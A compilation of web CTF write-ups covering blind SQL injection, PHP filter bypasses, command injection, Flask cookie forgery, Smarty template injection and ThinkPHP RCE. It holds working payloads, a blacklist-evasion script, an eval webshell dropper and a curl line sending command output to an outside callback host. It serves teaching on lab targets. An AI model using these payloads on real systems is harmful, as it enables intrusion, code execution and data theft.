[鹤城杯 2021] Traffic Analysis (流量分析)

You are handed a packet capture at the start; it is traffic analysis, a classic old challenge.

Counting the characters out one by one is obviously too slow, so here is a script borrowed from elsewhere:

# strings timu.pcapng | grep flag > a.txt
# (run in Kali: pull out every printable string that contains "flag")
import re
f = open("D:\\vscodework\\ctf\\tjctf\\a.txt", "rb")
# read a.txt; bytes that are not valid UTF-8 are dropped
st = f.read().decode("utf-8", "ignore")
f.close()
# each request line looks like this:
# GET /ctf/Less-5/?id=1'%20and%20ascii(substr((select%20flag%20from%20t),1,1))=33--+ HTTP/1.1

lis = re.findall(r",([0-9]*),1\)\)=([0-9]*)", st)
# capture (position, ascii value) from every probe
aa = ['' for i in range(50)]
for t in lis:
    # ('1', '33'), ('1', '34'), ('1', '35'), ('1', '36'), ('1', '37'), ...
    # position 1 is probed with 33, 34, ... until a value matches, then the scanner moves on
    # to position 2, so the last value written to each index is the matching character
    aa[int(t[0])] = chr(int(t[1]))
# print(aa)

for i in aa:
    print(i, end="")


# the intermediate list as dumped while debugging (cut short in the original write-up):
sss = [('1', '33'), ('1', '34'), ('1', '35'), ('1', '36'), ('1', '37'), ('1', '38'), ('1', '39'), ('1', '40'), ('1', '41'), ('1', '42'), ('1', '43'), ('1', '44'), ('1', '45'), ('1', '46'), ('1', '47'), ('1', '48'), ('1', '49'), ('1', '50'), ('1', '51'), ('1', '52'), ('1', '53'), ('1', '54'), ('1', '55'), ('1', '56'), ('1', '57'), ('1', '58'), ('1', '59'), ('1', '60'), ('1', '61'), ('1', '62'), ('1', '63'), ('1', '64'), ('1', '65'), ('1', '66'), ('1', '67'), ('1', '68'), ('1', '69'), ('1', '70'), ('1', '71'), ('1', '72'), ('1', '73'), ('1', '74'), ('1', '75'), ('1', '76'), ('1', '77'), ('1', '78'), ('1', '79'), ('1', '80'), ('1', '81'), ('1', '82'), ('1', '83'), ('1', '84'), ('1', '85'), ('1', '86'), ('1', '87'), ('1', '88'), ('1', '89'), ('1', '90'), ('1', '91'), ('1', '92'), ('1', '93'), ('1', '94'), ('1', '95'), ('1', '96'), ('1', '97'), ('1', '98'), ('1', '99'), ('1', '100'), ('1', '101'), ('1', '102'), ('2', '33'), ('2', '34'), ('2', '35'), ('2', '36'), ('2', '37'), ('2', '38'), ('2', '39'), ('2', '40'), ('2', '41'), ('2', '42'), ('2', '43'), ('2', '44'), ('2', '45'), ('2', '46'), ('2', '47'), ('2', '48'), ('2', '49'), ('2', '50'), ('2', '51'), ('2', '52'), ('2', '53'), ('2', '54'), ('2', '55'), ('2', '56'), ('2', '57'), ('2', '58'), ('2', '59'), ('2', '60'), ('2', '61'), ('2', '62'), ('2', '63'), ('2', '64'), ('2', '65'), ('2', '66'), ('2', '67'), ('2', '68'), ('2', '69'), ('2', '70'), ('2', '71'), ('2', '72'), ('2', '73'), ('2', '74'), ('2', '75'), ('2', '76'), ('2', '77'), ('2', '78'), ('2', '79'), ('2', '80'), ('2', '81'), ('2', '82'), ('2', '83'), ('2', '84'), ('2', '85'), ('2', '86'), ('2', '87'), ('2', '88'), ('2', '89'), ('2', '90'), ('2', '91'), ('2', '92'), ('2', '93'), ('2', '94'), ('2', '95'), ('2', '96'), ('2', '97'), ('2', '98'), ('2', '99'), ('2', '100'), ('2', '101'), ('2', '102'), ('2', '103'), ('2', '104'), ('2', '105'), ('2', '106'), ('2', '107'), ('2', '108'), ('3', '33'), ('3', '34'), ('3', '35'), ('3', '36'),
]

aaa = ['' for i in range(50)]
for t in sss:
    # ('1', '33'), ('1', '34'), ('1', '35'), ('1', '36'), ('1', '37'), ...
    aaa[int(t[0])] = chr(int(t[1]))
print(aaa)

# flag{w1reshARK_ez_1sntit}~~~~<
# The trailing ~~~~< is not part of the flag: the scanner kept probing positions beyond the
# closing brace, nothing matched there, and the last value tried at each of them (mostly 126,
# which is '~') is what ended up in the list.

Or do it in one step, reading the pcapng directly (the probes are plain text inside the capture, so the same regex works on the raw bytes):

import re
f = open("D:\\vscodework\\ctf\\tjctf\\timu.pcapng", "rb")
st = f.read().decode("utf-8", "ignore")
f.close()
lis = re.findall(r",([0-9]*),1\)\)=([0-9]*)", st)
aa = ['' for i in range(50)]
for t in lis:
    # ('1', '33'), ('1', '34'), ('1', '35'), ('1', '36'), ('1', '37'), ...
    aa[int(t[0])] = chr(int(t[1]))

for i in aa:
    print(i, end="")
# flag{w1reshARK_ez_1sntit}~~~~<
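The same reconstruction as an added, self-contained example (my code, not the write-up's script). It runs on a constructed set of probe lines embedded inline instead of timu.pcapng, keeps the write-up's regex and its "last value tried wins" rule, and additionally reports positions the scanner exhausted without a hit, which is what produced the `~~~~<` tail above. The sample data and the `scan_max` cut-off are assumptions; a flag whose real character is `~` (126) would be reported as unresolved by this heuristic, so check the responses in that case.

```python
import re

# Constructed stand-in for the request lines `strings timu.pcapng | grep flag` pulls out of the
# challenge capture: one boolean-based blind-SQLi probe per line, scanning each character
# position of the flag upward from ASCII 33. Sample data, not the real capture.
def _probe(pos, code):
    return ("GET /ctf/Less-5/?id=1'%20and%20ascii(substr((select%20flag%20from%20t),"
            f"{pos},1))={code}--+ HTTP/1.1")

SAMPLE_REQUESTS = "\n".join(
    [_probe(1, c) for c in range(33, 103)]     # stops at 102 = 'f'  (hit)
    + [_probe(2, c) for c in range(33, 109)]   # stops at 108 = 'l'  (hit)
    + [_probe(3, c) for c in range(33, 98)]    # stops at 97  = 'a'  (hit)
    + [_probe(4, c) for c in range(33, 127)]   # runs to 126: nothing matched at position 4
)

# Same capture groups as the write-up's regex: (position, ascii value tried).
PROBE_RE = re.compile(r",([0-9]+),1\)\)=([0-9]+)")

def recover(text, scan_max=126):
    """Rebuild the extracted string from the probes alone (no responses needed).

    The scanner only moves to position n+1 after a probe for position n returned true, so the
    last value tried for a position is the character the database confirmed. A position whose
    last probe reached scan_max was scanned to exhaustion without a hit; it is reported as
    unresolved instead of being turned into a bogus '~'.
    """
    last_tried = {}
    for pos, code in PROBE_RE.findall(text):
        last_tried[int(pos)] = int(code)   # later probes overwrite earlier ones
    recovered, unresolved = [], []
    for pos in sorted(last_tried):
        code = last_tried[pos]
        if code >= scan_max:
            unresolved.append(pos)
        else:
            recovered.append(chr(code))
    return "".join(recovered), unresolved

if __name__ == "__main__":
    flag, gaps = recover(SAMPLE_REQUESTS)
    print(flag, "unresolved positions:", gaps)
```

To use it on the real capture, replace SAMPLE_REQUESTS with `open("timu.pcapng", "rb").read().decode("utf-8", "ignore")` as in the one-step script; findall preserves file order, which the rule depends on. The rule only holds for an `=` scan that walks values in order; a scanner that bisects with `>` or `<` needs the responses.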

[鹤城杯 2021]EasyP

<?php
include 'utils.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}

if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}

if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}
?>

PHP_SELF is the script path plus everything that follows it (the PATH_INFO), i.e. the part after the `/`. For the request below it is `/index.php/utils.php/\x89`: it no longer ends in `utils.php` or `utils.php/`, so the first preg_match does not fire.

The underscore in the parameter name can be replaced with `[`: PHP rewrites `show[source` to `show_source` when it builds `$_GET`, so `isset($_GET['show_source'])` is true while REQUEST_URI never contains the literal string `show_source`.

index.php/utils.php/%89?show[source=1

%89 is a non-ASCII byte (the original note used %88; either works). Why an invisible character? If it were replaced with `a`, $_SERVER['PHP_SELF'] would end in `utils.php/a`, basename() would return `a`, and highlight_file() would show a file called `a`, which is clearly wrong. basename() stops reading the path at a byte that is not valid in the current locale, so `utils.php/%89` yields `utils.php`, which is exactly what we want: the trailing non-ASCII byte is discarded and utils.php (where $secret and $flag live) gets printed.


[鹤城杯 2021]Middle magic

<?php
highlight_file(__FILE__);
include "./flag.php";
include "./result.php";
if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){

    $aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']);

    if(preg_match('/pass_the_level_1#/', $aaa)){
        echo "here is level 2";

        if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {
            if ($_POST['admin'] == $_POST['root_pwd'])
                echo '<p>The level 2 can not pass!</p>';
            // START FORM PROCESSING
            else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){
                echo "here is level 3,do you kown how to overcome it?";
                if (isset($_POST['level_3'])) {
                    $level_3 = json_decode($_POST['level_3']);

                    if ($level_3->result == $result) {

                        echo "success:".$flag;
                    }
                    else {
                        echo "you never beat me!";
                    }
                }
                else{
                    echo "out";
                }
            }
            else{

                die("no");
            }
            // perform validations on the form data
        }
        else{
            echo '<p>out!</p>';
        }

    }

    else{
        echo 'nonono!';
    }

    echo '<hr>';
}

?>

Response after all three stages (the echos run together): here is level 2here is level 3,do you kown how to overcome it?success:NSSCTF{1cf861d8-a8f0-4ed0-92e8-2c251e4b34a6}
Stage 1 is bypassed with a leading newline. `.` does not match `\n` and the pattern has neither the `s` nor the `m` modifier, so `/^(.*)level(.*)$/` cannot match a value that starts with `%0a`; the string reaches `preg_match('/pass_the_level_1#/')` untouched (and stays under the 20-character limit):

http://node4.anna.nssctf.cn:28689/?aaa=%0apass_the_level_1%23

Stages 2 and 3 go in the POST body:

admin[]=1&root_pwd[]=a&level_3={'result':'result'}

Sending both fields as arrays makes `$_POST['admin'] == $_POST['root_pwd']` false (the elements differ), while `sha1()` called on an array returns NULL with a warning on PHP 7, so `NULL === NULL` opens level 3, where the decoded value is only compared with `==`.

[MoeCTF 2021]babyRCE

<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
        echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

http://node2.anna.nssctf.cn:28603/?rce=grep${IFS}f${IFS}fla?.php

http://node2.anna.nssctf.cn:28603/?rce=ca\t${IFS}fla\g.php

Use ${IFS} for the space; the other substitutes did not seem to work here. `$`, `{`, `}`, `\` and `?` are all absent from the blacklist, so `${IFS}` stands in for the blocked space, a backslash splits the banned words `cat` and `flag` without changing what the shell runs, and `fla?.php` globs to flag.php.

[LitCTF 2023] 作业管理系统 (Homework Management System)

Saw it was set by 探姬 and expected it to be hard, but it isn't: the page source shown at the start contains the default credentials, admin/admin.

Log in, then upload a file right here.


The upload lands in ./, the current directory, so just browse to the uploaded file.


[LitCTF 2023]Ping

command=127.0.0.1;cat /flag&ping=Ping

The `;` ends the ping command and runs `cat /flag` in the same shell, so the flag comes back together with the ping output.


[LitCTF 2023]Vim yyds

When vim is interrupted mid-edit it leaves a swap file named .index.php.swp behind, so download http://node2.anna.nssctf.cn:28510/.index.php.swp directly. Opened as-is it looks like garbage (it is vim's binary swap format); drop it on any Linux box and run `vim -r .index.php.swp` to recover the source.



[LitCTF 2023] Flag点击就送! (Flag, click to claim!)

└─# python3 flask_session_cookie_manager3.py decode -c 'eyJuYW1lIjoiMTIzMTIzIn0.ZJBfaw.eXjErywCjj_0-tZe0l8-X_jc6hA' -s 'LitCTF'
{'name': '123123'}


┌──(root㉿bohemian)-[/tools/flask-session-cookie-manager]
└─# python3 flask_session_cookie_manager3.py decode -c 'eyJuYW1lIjoiMTIzMTIzMTIzIn0.ZJBf2g.6hBTi7wSIWzWnWHr8F4P9t4CItw' -s 'LitCTF'
{'name': '123123123'}

┌──(root㉿bohemian)-[/tools/flask-session-cookie-manager]
└─# python3 flask_session_cookie_manager3.py encode -s 'LitCTF' -t "{'name': 'admin'}"
eyJuYW1lIjoiYWRtaW4ifQ.ZJBgMQ.JTcEaSlnwJUiq70P847ooZJe0T4
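What the tool is doing, as an added example in plain Python (my code, not the write-up's or flask-session-cookie-manager's): a standard-library re-implementation of Flask's session signing, which is itsdangerous' URLSafeTimedSerializer with salt `cookie-session`, HMAC key derivation and SHA-1. It verifies the two cookies above, forges the admin cookie with the same timestamp, and runs a small dictionary attack that recovers `LitCTF`. The candidate wordlist is made up for the example; everything else follows the fixed Flask parameters.

```python
import base64, hashlib, hmac, json, time, zlib

# Flask signs its session cookie with itsdangerous' URLSafeTimedSerializer using these fixed
# parameters (SecureCookieSessionInterface): salt "cookie-session", HMAC key derivation, SHA-1.
SALT = b"cookie-session"

def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=")

def _b64d(text):
    return base64.urlsafe_b64decode(text + b"=" * (-len(text) % 4))

def _signature(secret, signed_value):
    # key_derivation="hmac": the signing key is HMAC-SHA1(secret, salt), not the secret itself
    key = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    return _b64e(hmac.new(key, signed_value, hashlib.sha1).digest())

def sign_session(data, secret, timestamp=None):
    """Forge a cookie for `data` (what `encode -s ... -t ...` in the tool does)."""
    payload = _b64e(json.dumps(data, separators=(",", ":"), sort_keys=True).encode())
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed_value = payload + b"." + ts_b64
    return (signed_value + b"." + _signature(secret, signed_value)).decode()

def verify_session(cookie, secret):
    """Return the session dict if `secret` reproduces the cookie's signature, else None."""
    try:
        payload, ts_b64, sig = cookie.encode().rsplit(b".", 2)
    except ValueError:
        return None
    if not hmac.compare_digest(sig, _signature(secret, payload + b"." + ts_b64)):
        return None
    # itsdangerous zlib-compresses large payloads and flags that with a leading dot
    if payload.startswith(b"."):
        raw = zlib.decompress(_b64d(payload[1:]))
    else:
        raw = _b64d(payload)
    return json.loads(raw)

def crack_secret(cookie, candidates):
    """Offline dictionary attack: the first candidate that verifies the cookie is the app's secret."""
    for secret in candidates:
        if verify_session(cookie, secret) is not None:
            return secret
    return None

if __name__ == "__main__":
    cookie = "eyJuYW1lIjoiMTIzMTIzIn0.ZJBfaw.eXjErywCjj_0-tZe0l8-X_jc6hA"
    print(verify_session(cookie, "LitCTF"))
    print(sign_session({"name": "admin"}, "LitCTF"))
```

The payload part is not encrypted, only signed, which is why anyone can read `{"name":"123123"}` out of the cookie without the key; the secret only stops you from writing a new one. A guessable secret like the event name turns that into a one-line privilege escalation, and the signature stays valid for any timestamp the app is willing to accept.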


[LitCTF 2023] PHP是世界上最好的语言!! (PHP is the best language in the world!!)

Guessed it.


[LitCTF 2023] Http pro max plus (solved)

Client-Ip: 127.0.0.1
X-Forwarded-For: 127.0.0.1
Remote-Addr: 127.0.0.1
X-Real-Ip: 127.0.0.1
REMOTE-HOST: 127.0.0.1
via:127.0.0.1

var list_of_fake_ip_headers = ["X-Forwarded-For","X-Forwarded","Forwarded-For","Forwarded","X-Forwarded-Host","X-remote-IP","X-remote-addr","True-Client-IP","X-Client-IP","Client-IP","X-Real-IP","Ali-CDN-Real-IP","Cdn-Src-Ip","Cdn-Real-Ip","CF-Connecting-IP","X-Cluster-Client-IP","WL-Proxy-Client-IP","Proxy-Client-IP","Fastly-Client-Ip","True-Client-Ip"];

This is the deny list from the challenge's own front-end script. Header names are case-insensitive, so X-Forwarded-For, X-Real-Ip and Client-Ip from the set above are all on it; the ones that are not are Remote-Addr, REMOTE-HOST and via.


NSSCTF{50e3aa21-3d2f-4b28-9670-ac2590b70250}

[GDOUCTF 2023]EZ WEB

Changing the request method to PUT is all it takes.

[HDCTF 2023]SearchMaster

<title>BadBadBooooy</title>

The page mentions PHP Smarty, so the search field is a template-injection sink:

data={if system('cat /flag_13_searchmaster')}{/if}


[SWPUCTF 2021 新生赛]finalrce

<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}

Blind RCE: exec() returns nothing to the page.

Out-of-band exfiltration through a DNS/HTTP callback works, but http://ceye.io/ seemed to be unavailable today:

?url=1;curl `whoami`.*****s.ceye.io/


Method 2: redirect the output into a file under the web root with tee, then fetch it:

?url=l''s / | tee 1.txt
then fetch http://node2.anna.nssctf.cn:28030/1.txt
?url=ca''t /flllll\aaaaaaggggggg | tee 2.txt
?url=ca''t /flllll''aaaaaaggggggg | tee 2.txt
then fetch http://node2.anna.nssctf.cn:28030/2.txt

`ls`, `cat` and even the two letters `la` are on the blacklist, so every banned substring is split with `''` or `\`; the shell strips both before running the command, so `l''s` is `ls` and `ca''t` is `cat`.
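For both this challenge and babyRCE above, an added example (my code, not from either write-up) that tests a command against a challenge's blacklist offline the way preg_match() does and derives a passing variant automatically using the two tricks used above: splitting banned words with `''` or `\` and swapping a banned space for `${IFS}`. The two blacklists are copied from the challenge sources; the rewrite order, the separator preference and the `${IFS}` fallback are my choices.

```python
import re

# The two preg_match() blacklists, copied from the challenge sources with the PHP delimiters
# and /i flag removed (re.IGNORECASE is passed instead). Both are plain alternations, which
# Python's re and PCRE read identically.
BABYRCE_FILTER = r"cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\""
FINALRCE_FILTER = r"bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$"

def blocked(pattern, payload):
    """True when preg_match() would fire on `payload`, i.e. the server rejects it."""
    return re.search(pattern, payload, re.IGNORECASE) is not None

def pick_separator(pattern):
    """A token the shell discards during word splitting: an empty single-quoted string ('')
    or a backslash before an ordinary letter. ca''t, ca\\t and cat all run the same binary.
    Returns the first one the filter lets through, or None if both are banned."""
    for sep in ("''", "\\"):
        if not blocked(pattern, sep):
            return sep
    return None

def obfuscate(command, pattern, max_rounds=50):
    """Rewrite `command` until preg_match() no longer matches.

    Each round takes the leftmost blacklisted fragment and either splices the separator into a
    banned word (before its last letter) or swaps a banned space for ${IFS}. Returns the passing
    payload, or None when a match cannot be rewritten with these two tricks (for example a
    banned metacharacter the command genuinely needs).
    """
    sep = pick_separator(pattern)
    payload = command
    for _ in range(max_rounds):
        m = re.search(pattern, payload, re.IGNORECASE)
        if m is None:
            return payload
        frag = m.group(0)
        if frag == " " and not blocked(pattern, "${IFS}"):
            repl = "${IFS}"
        elif frag.isalpha() and len(frag) >= 2 and sep is not None:
            repl = frag[:-1] + sep + frag[-1]
        else:
            return None
        payload = payload[:m.start()] + repl + payload[m.end():]
    return None

if __name__ == "__main__":
    print(obfuscate("cat flag.php", BABYRCE_FILTER))
    print(obfuscate("cat /flag | tee 2.txt", FINALRCE_FILTER))
```

Checking locally first matters more than it looks: every rejected request is a log line on the target, and with a blind sink like exec() you get no feedback on which character tripped the filter. The rewrite is deliberately minimal; when it returns None the command needs a different primitive (a wildcard, a variable, encoding), not more splitting.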

[羊城杯 2020]easycon

A simple one. The site lands on the Apache2 default page; index.php pops an alert hinting at eval with a POST parameter cmd, so cmd=phpinfo(); runs straight away. After looking around there is no flag anywhere, but there is a bbbbbb.txt; run it through CyberChef.

Out comes an image, and the flag is in it.


[SWPUCTF 2021 新生赛]PseudoProtocols

Read hint.php straight through the php://filter wrapper, base64-encoded so it is not executed:

http://node2.anna.nssctf.cn:28419/index.php?wllm=php://filter/convert.base64-encode/resource=hint.php

<?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    echo "success\n";
    echo $flag;
}
?>

file_get_contents() accepts a data:// URL, so the expected string can be supplied inline: http://node2.anna.nssctf.cn:28419/test2222222222222.php?a=data://text/plain,I want flag

[SWPUCTF 2022 新生赛]ez_rce

echo "PD9waHAgZXZhbCgkX1BPU1RbYV0pOz8+" | base64 -d > s.php

The base64 decodes to `<?php eval($_POST[a]);?>`; encoding it keeps `$`, quotes and `<`/`>` out of the URL. The alternative

PD9waHAgQGV2YWwoJF9QT1NUWydnJ10pOz8+

is `<?php @eval($_POST['g']);?>`.

The RCE itself is the ThinkPHP 5 invokefunction chain; this call runs phpinfo() to confirm execution before dropping the shell:

http://node1.anna.nssctf.cn:28306/NSS/in1dex.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=

[HUBUCTF 2022 新生赛]checkin

<?php
show_source(__FILE__);
$username = "this_is_secret";
$password = "this_is_not_known_to_you";
include("flag.php");//here I changed those two
$info = isset($_GET['info'])? $_GET['info']: "" ;
$data_unserialize = unserialize($info);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";

}

Generator for the payload (run locally):

<?php
$info = array(
    'username'=>true,
    'password'=>true
);
$serialized_data = serialize($info);
echo $serialized_data ;
?>


?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}

`true == "this_is_secret"` holds under PHP's loose comparison (the string side is converted to bool, and any non-empty string is true), so two booleans satisfy both checks without knowing either value.

[UUCTF 2022 新生赛] ez_rce (solved)

http://node1.anna.nssctf.cn:28921/?code=?><?=`nl /fffffffffflagafag`;